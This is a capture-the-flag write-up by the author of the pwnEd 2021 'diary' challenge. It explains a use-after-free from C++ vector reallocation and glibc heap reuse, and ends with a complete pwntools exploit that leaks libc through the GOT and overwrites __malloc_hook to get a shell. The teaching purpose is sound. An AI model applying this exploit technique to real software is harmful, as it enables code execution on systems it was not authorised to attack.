pwnEd 2021 - Diary Pwn Challenge

2021-03-12 ctf pwn

pwnEd 2021 was the second iteration of the University of Edinburgh cyber security competition hosted by SIGINT from CompSoc. I’m a member of SIGINT and was the author of the diary pwn challenge, which was the only challenge without any solves throughout the CTF.

This post will attempt to describe how to solve this challenge in detail for those with less experience in heap exploitation.

Note: This challenge was modified from UnionCTF 2021’s notepad challenge, which I also wrote.

Bug

The crucial bug in the code provided is a use-after-free of Diary::currentEntry_, which is located in diary.h. In other words, Diary::currentEntry_ can end up holding a pointer to memory that has already been freed.

class Diary {
private:
    Entry* findEntryByName(const std::string& search)
    {
        auto result = std::find_if(entries_.begin(), entries_.end(), 
            [&](Entry& entry) {
                if (std::strstr(entry.getName().data(), search.data())) {
                    return true;
                }
                return false;
            }
        );

        if (result != entries_.end()) {
            return &*result;
        }
        return nullptr;
    }

    std::vector<Entry> entries_;
    Entry* currentEntry_;

public:
    Diary()
    {
        entries_.reserve(5);
    }

    void createEntry(const std::string& name, const std::string& content)
    {
        // Bug: reallocation occurs when vector reaches capacity
        entries_.emplace_back(name, content);
    }

    Entry& getEntry(size_t idx)
    {
        return entries_.at(idx);
    }

    void editEntryName(const std::string& name)
    {
        currentEntry_->setName(name);
    }

    void editEntryContent(const std::string& content)
    {
        currentEntry_->setContent(content);
    }

    bool selectEntryByName(const std::string& search)
    {
        auto entry = findEntryByName(search);
        if (entry != nullptr) {
            currentEntry_ = entry;
            return true;
        }
        return false;
    }

    void printCurrentEntry() const
    {
        currentEntry_->printContents();
    }
};

A C++ vector holds a pointer to a backing store, along with metadata such as its size and capacity. This backing store starts out with a certain capacity allocated from the heap.

Vector backing store when allocated

Since vectors can grow to an almost arbitrary size, the backing store needs to be resized whenever the capacity limit is reached. When entries are inserted into the vector Diary::entries_, the size of the vector grows until it hits this limit and triggers a reallocation.

Vector backing store when freed

A reallocation allocates a new, larger backing store, copies the contents of the current backing store into it, and frees the current backing store. The process is transparent to users of the vector: entries_ is updated to point to the new backing store. However, Diary::currentEntry_ still holds a pointer to an entry in the old backing store.
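To make the timing concrete, here is a minimal Python sketch that models which insertions trigger a reallocation. It assumes the vector doubles its capacity when full (the growth policy libstdc++ uses; the binary's standard library is an assumption here) and starts from the reserve(5) in the Diary constructor. The function name is made up for illustration.

```python
# Sketch: which createEntry() calls make entries_ reallocate.
# Assumption: capacity doubles when the vector is full (libstdc++ behaviour).

def reallocating_inserts(initial_capacity, inserts):
    """Return the 1-based insert numbers that trigger a reallocation."""
    capacity = initial_capacity
    size = 0
    triggers = []
    for n in range(1, inserts + 1):
        if size == capacity:
            # A new, larger backing store is allocated and the old one freed.
            capacity *= 2
            triggers.append(n)
        size += 1
    return triggers

# Diary's constructor calls entries_.reserve(5).
print(reallocating_inserts(5, 41))
```

Under these assumptions the 6th, 11th, 21st and 41st entries each free the previous backing store. Any entry selected just before one of those insertions leaves currentEntry_ dangling.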

What happens to the old backing store?

The point of freeing memory is so that it can be recycled by the memory allocator. In glibc, a freed chunk of memory is placed in a free bin. Which bin it goes into depends on the chunk size and the state of the bins, among other things. To name a few, there are fast bins, small bins, large bins, and the unsorted bin. The version the challenge uses (glibc 2.31) also has tcache. Let’s focus on the unsorted bin and tcache.

Upon the next allocation, the allocator looks into a suitable free list, which depends on the size of memory requested, removes a chunk from that list, and hands a pointer to it back to the caller. Tcache and fast bins are special because a chunk is only recycled from them when the requested size matches the bin’s size class exactly.

But what happens when the backing store enters the unsorted bin? That is where a freed chunk ends up when it is too large for tcache and the fast bins. The allocator can then serve smaller requests by carving them out of the unsorted chunk. This means that if we allocate a smaller object on the heap, a string for example, we will be able to overlap/overwrite the Entry object pointed to by currentEntry_.

Entry object is overwritten by new string
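As a rough check of when the backing store becomes large enough, the following Python sketch applies glibc's request-to-chunk-size rounding and compares the result with the default tcache limit on x86-64. The value sizeof(Entry) = 72 is an assumption (an 8-byte vtable pointer plus two 32-byte libstdc++ std::string objects), and the helper names are made up for illustration. The model ignores full tcache bins and consolidation with the top chunk.

```python
# Sketch: where does a freed vector backing store go first?
# glibc 2.31 defaults on x86-64.
SIZE_SZ = 8                # size of the chunk header field
MALLOC_ALIGNMENT = 16
MIN_CHUNK_SIZE = 32
TCACHE_MAX_CHUNK = 0x410   # largest chunk size tcache will hold

# Assumption: 8-byte vptr + two 32-byte std::string members.
ENTRY_SIZE = 72

def chunk_size(request):
    """Round a malloc request up to the chunk size glibc actually uses."""
    size = (request + SIZE_SZ + MALLOC_ALIGNMENT - 1) & ~(MALLOC_ALIGNMENT - 1)
    return max(size, MIN_CHUNK_SIZE)

def first_free_list(request):
    """Simplified: assumes the matching tcache bin is not already full."""
    if chunk_size(request) <= TCACHE_MAX_CHUNK:
        return "tcache"
    return "unsorted bin"

for capacity in (5, 10, 20, 40):
    request = capacity * ENTRY_SIZE
    print(capacity, hex(chunk_size(request)), first_free_list(request))
```

Under these assumptions the 5- and 10-entry stores (chunk sizes 0x170 and 0x2e0) go to tcache, while the 20-entry store (0x5b0) is the first one to reach the unsorted bin. That is consistent with the exploit later in this post creating 20 notes before selecting one.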

Protections

Let’s quickly look at the general protections in place for this binary.

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE (0x400000)
  • We have full RELRO, which prevents you from overwriting the global offset table.
  • Stack canaries are in place, but since the bug is heap based, they are rather irrelevant.
  • NX bit should be set unless you time travelled to 1999.
  • No PIE means that binary addresses don’t need to be leaked, as the executable itself is not subject to ASLR. Libraries are still randomized.

Exploit path

Hopefully now there’s a clear idea of the cause and implications of the bug. Let’s see how we can exploit it.

Overlapping object primitive

First observe the Entry class.

class Entry {
private:
    std::string name_;
    std::string content_;

public:
    Entry(const std::string& name, const std::string& content) : name_(name), content_(content) {}
    
    virtual std::string& getName()
    {
        return name_;
    }

    virtual std::string& getContent()
    {
        return content_;
    }

    virtual void printContents() const
    {
        char buf[32];
        char const* entryStart = "     _______________________  \n"
                                "   =(__    ___      __     _)=\n";
        char const* entryEnd   = "   =(_______________________)=\n";
        char const* line      = "     | %-19s |\n";

        std::string output(entryStart);
        for (size_t i = 0; i < content_.length(); i += 19) {
            std::memset(buf, 0, sizeof(buf));
            auto part = content_.substr(i, 19);
            std::snprintf(buf, sizeof(buf), line, part.data());
            output += std::string(buf);
        }
        output += entryEnd;
        std::cout << output << std::endl;
    }

    void setName(const std::string& name)
    {
        name_ = name;
    }

    void setContent(const std::string& content)
    {
        content_ = content;
    }
};

If we can write data into the newly allocated object, we can overwrite pointers in the Entry object, for example the backing-store pointer of a std::string. There are two std::string fields in Entry. These are light abstractions over C strings whose backing store is also allocated on the heap (when the string is large enough). Each field contains metadata, including a pointer to the string’s backing store. That pointer is where the program reads from when printing the string and writes to when setting it. Controlling it can therefore yield an arbitrary read/write primitive that could lead to code execution.
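The overlap can be pictured with a small Python sketch that builds the bytes of a fake Entry. It assumes the libstdc++ layout of std::string on x86-64 (data pointer, length, then a 16-byte field that holds either the small-string buffer or the capacity) and a vtable pointer at offset 0. The helper names and the addresses in the example are hypothetical and not taken from the challenge binary.

```python
import struct

# Assumed libstdc++ std::string layout on x86-64 (32 bytes):
#   +0x00 pointer to character data
#   +0x08 length
#   +0x10 capacity (when the data lives on the heap), then 8 unused bytes
def fake_string(data_ptr, length, capacity):
    return struct.pack("<QQQQ", data_ptr, length, capacity, 0)

# Assumed Entry layout: vptr at +0x00, name_ at +0x08, content_ at +0x28.
def fake_entry(vtable_ptr, name, content):
    return struct.pack("<Q", vtable_ptr) + name + content

# Hypothetical addresses, for illustration only.
VTABLE = 0x404010
TARGET = 0x405018

entry = fake_entry(
    VTABLE,
    fake_string(TARGET, 8, 0x40),   # name_ now "lives" at TARGET
    fake_string(TARGET, 8, 0x40),   # so does content_
)
print(len(entry), entry.hex())
```

The capacity field matters for the write direction: if the assigned string is longer than the recorded capacity, the string allocates a fresh buffer instead of writing through the forged pointer. The vtable pointer has to stay valid as well, because printContents is a virtual call.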

Entry object is overwritten by new string

Bad drawing aside, an attacker can point the backing store to critical locations, say the global offset table. From there we overwrite an entry with system and get a shell… right? Remember that we have full RELRO, so the GOT is read only. We need to overwrite another code pointer, such as __free_hook, instead.

That is not to say pointing to the GOT is useless: we can read the string instead to get a libc leak. The leak bypasses address space layout randomization (ASLR) by handing us an address from which we can calculate the position of system or of one gadgets. With system in __free_hook, we can simply free a buffer containing /bin/sh to pop a shell.
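The leak arithmetic is short enough to sketch in plain Python. The offset 0x18b660 is the libc_strlen constant from the exploit in this post. The example address and the helper name are made up for illustration. Only six bytes are read because user-space addresses on x86-64 have their top two bytes set to zero, so printing the string stops there.

```python
import struct

# Offset subtracted from the leaked strlen GOT value (taken from the exploit).
LIBC_STRLEN_OFFSET = 0x18b660

def libc_base_from_leak(leaked_bytes):
    """Turn the first 6 leaked bytes into a libc base address."""
    raw = leaked_bytes[:6].ljust(8, b"\x00")   # pad back to 8 bytes
    address = struct.unpack("<Q", raw)[0]      # little-endian 64-bit value
    return address - LIBC_STRLEN_OFFSET

# Hypothetical leak: a made-up libc base plus the strlen offset.
example_base = 0x7f1234567000
example_leak = struct.pack("<Q", example_base + LIBC_STRLEN_OFFSET)[:6]

base = libc_base_from_leak(example_leak)
print(hex(base))
```

A quick sanity check on a real leak is that the computed base is page aligned, that is, its low 12 bits are zero.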

Here’s the full exploit. It takes the one-gadget route and overwrites __malloc_hook through the same primitive:

from pwn import *

exe = context.binary = ELF('./diary')
libc = ELF('./libc-2.31.so')

host = args.HOST or 'localhost'
port = int(args.PORT or 1337)

'''
Exploit path
1. Trigger vector realloc for UAF
2. UAF string backing store overwrite for GOT libc leak
3. Trigger another vector realloc for UAF
4. Malloc hook overwrite with edit to one gadget
5. Shell
'''

def local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    if args.GDB:
        return gdb.debug([exe.path] + argv, *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)

def remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = connect(host, port)
    if args.GDB:
        gdb.attach(io)
    return io

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.LOCAL:
        return local(argv, *a, **kw)
    else:
        return remote(argv, *a, **kw)

def create_note(name, content):
    io.sendlineafter('>', '1')
    io.sendlineafter('Name:', name)
    io.sendlineafter('Content:', content)

def find_note(name):
    io.sendlineafter('>', '2')
    io.sendlineafter('Look for:', name)

def edit_current(name, content):
    io.sendlineafter('>', '3')
    io.sendlineafter('>', '2')
    io.sendlineafter('Name:', name)
    io.sendlineafter('Content:', content)
    io.sendlineafter('>', '3')

def print_current():
    io.sendlineafter('>', '3')
    io.sendlineafter('> ', '1')
    io.recvuntil('choice: 1\n')
    leak = io.recvuntil('1. View')[:-7]
    io.sendlineafter('>', '3')
    return leak

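# libc offsets (relative to the libc base) + other constants
one_gadget = 0xe6c81     # offset of the one gadget written into __malloc_hook
libc_strlen = 0x18b660   # offset subtracted from the leaked strlen GOT value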

io = start(env={'LD_PRELOAD': libc.path})

# Read primitive via UAF
for i in range(20):
    create_note(f'GAMESTOP{i}', 'GAMESTOP')
find_note('GAMESTOP1')
create_note(cyclic(0x36), 'GAMESTOP')
create_note(flat({0x28: exe.sym._ZTV5Entry + 0x10}), flat({0x10: exe.got.strlen}))

# Leak libc
leak = print_current()
leak = leak[leak.find(b'_)=\n     | ') + len(b'_)=\n     | '):]
libc_leak = u64(leak[:6] + b'\x00' * 2)
libc.address = libc_leak - libc_strlen
log.info(f'Libc base: 0x{libc.address:x}')

# Write primitive via UAF
for i in range(18):
    create_note('GAMESTOP', 'GAMESTOP')
find_note('GAMESTOP1')
create_note(cyclic(0x2c1), 'GAMESTOP')
create_note(cyclic(0x36), flat({0x20: libc.sym.__malloc_hook}))
create_note(flat({0x20: libc.sym.__malloc_hook}), '/bin/sh')

# Edit overwrite
io.sendlineafter('>', '3')
io.sendlineafter('>', '2')
io.sendlineafter('Name:', p64(libc.address + one_gadget))
io.sendlineafter('Content:', 'GAMESTOP' * 6)

io.interactive()